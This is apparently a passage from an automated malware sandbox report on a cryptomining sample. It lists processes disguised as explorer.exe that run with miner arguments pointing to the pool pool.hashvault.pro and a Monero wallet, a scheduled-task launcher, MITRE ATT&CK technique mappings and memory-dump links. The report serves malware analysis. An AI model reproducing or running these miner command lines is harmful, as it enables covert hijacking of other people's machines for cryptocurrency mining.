C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1512

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1572

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1716

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:392

C:\Windows\explorer.exe
C:\Windows\explorer.exe --donate-level 0 --cpu-max-threads-hint 30 -o pool.hashvault.pro:80 -u 42LYsSTjkZR6qxBkYScoFAHVE9MkTeXT2bda7wvc16aZ1MKEqaoKydrb1LWwjGdSvkFbTRzSuFCdg2o37k43warJ6cnhid2.x
2⤵
PID:1588

C:\Windows\system32\taskeng.exe
taskeng.exe {F6A35951-3F34-4AD4-B388-FDC9C458B64F} S-1-5-21-790309383-526510583-3802439154-1000:TVHJCWMH\Admin:Interactive:[1]
1⤵
PID:1556

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/304-293-0x00000000FFB148A0-mapping.dmp

Download
memory/392-419-0x00000000FFB148A0-mapping.dmp

Download
memory/528-302-0x00000000FFB148A0-mapping.dmp

Download
memory/532-194-0x00000000FFB148A0-mapping.dmp

Download
memory/540-221-0x00000000FFB148A0-mapping.dmp

Download
memory/548-266-0x00000000FFB148A0-mapping.dmp

Download
memory/568-63-0x0000000000000000-mapping.dmp

Download
memory/604-212-0x00000000FFB148A0-mapping.dmp

Download
memory/648-383-0x00000000FFB148A0-mapping.dmp

Download
memory/756-97-0x00000000FFB148A0-mapping.dmp

Download
memory/840-203-0x00000000FFB148A0-mapping.dmp

Download
memory/856-338-0x00000000FFB148A0-mapping.dmp

Download
memory/884-133-0x00000000FFB148A0-mapping.dmp

Download
memory/888-347-0x00000000FFB148A0-mapping.dmp

Download
memory/940-374-0x00000000FFB148A0-mapping.dmp

Download
memory/940-55-0x0000000000000000-mapping.dmp

Download
memory/960-275-0x00000000FFB148A0-mapping.dmp

Download
memory/1048-176-0x00000000FFB148A0-mapping.dmp

Download
memory/1068-88-0x00000000FFB148A0-mapping.dmp

Download
memory/1088-284-0x00000000FFB148A0-mapping.dmp

Download
memory/1128-311-0x00000000FFB148A0-mapping.dmp

Download
memory/1252-257-0x00000000FFB148A0-mapping.dmp

Download
memory/1272-65-0x00000000FF330000-0x00000000FFB1C000-memory.dmp

Filesize
7.9MB

Download
memory/1272-67-0x00000000FF330000-0x00000000FFB1C000-memory.dmp

Filesize
7.9MB

Download
memory/1272-69-0x00000000FF330000-0x00000000FFB1C000-memory.dmp

Filesize
7.9MB

Download
memory/1272-64-0x00000000FF330000-0x00000000FFB1C000-memory.dmp

Filesize
7.9MB

Download
memory/1272-72-0x00000000FF330000-0x00000000FFB1C000-memory.dmp

Filesize
7.9MB

Download
memory/1272-71-0x00000000FF330000-0x00000000FFB1C000-memory.dmp

Filesize
7.9MB

Download
memory/1272-70-0x00000000FFB148A0-mapping.dmp

Download
memory/1284-329-0x00000000FFB148A0-mapping.dmp

Download
memory/1384-115-0x00000000FFB148A0-mapping.dmp

Download
memory/1392-160-0x00000000FFB148A0-mapping.dmp

Download
memory/1396-167-0x00000000FFB148A0-mapping.dmp

Download
memory/1456-230-0x00000000FFB148A0-mapping.dmp

Download
memory/1468-185-0x00000000FFB148A0-mapping.dmp

Download
memory/1512-392-0x00000000FFB148A0-mapping.dmp

Download
memory/1536-356-0x00000000FFB148A0-mapping.dmp

Download
memory/1572-401-0x00000000FFB148A0-mapping.dmp

Download
memory/1588-428-0x00000000FFB148A0-mapping.dmp

Download
memory/1632-61-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/1632-62-0x00000000028BB000-0x00000000028DA000-memory.dmp

Filesize
124KB

Download
memory/1632-56-0x0000000000000000-mapping.dmp

Download
memory/1632-60-0x00000000028B4000-0x00000000028B7000-memory.dmp

Filesize
12KB

Download
memory/1632-59-0x000007FEF2E20000-0x000007FEF397D000-memory.dmp

Filesize
11.4MB

Download
memory/1632-58-0x000007FEF3980000-0x000007FEF43A3000-memory.dmp

Filesize
10.1MB

Download
memory/1688-79-0x00000000FFB148A0-mapping.dmp

Download
memory/1692-106-0x00000000FFB148A0-mapping.dmp

Download
memory/1716-410-0x00000000FFB148A0-mapping.dmp

Download
memory/1728-54-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmp

Filesize
8KB

Download
memory/1748-365-0x00000000FFB148A0-mapping.dmp

Download
memory/1856-142-0x00000000FFB148A0-mapping.dmp

Download
memory/1872-320-0x00000000FFB148A0-mapping.dmp

Download
memory/1876-151-0x00000000FFB148A0-mapping.dmp

Download
memory/1896-248-0x00000000FFB148A0-mapping.dmp

Download
memory/1952-124-0x00000000FFB148A0-mapping.dmp

Download
memory/2040-239-0x00000000FFB148A0-mapping.dmp

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads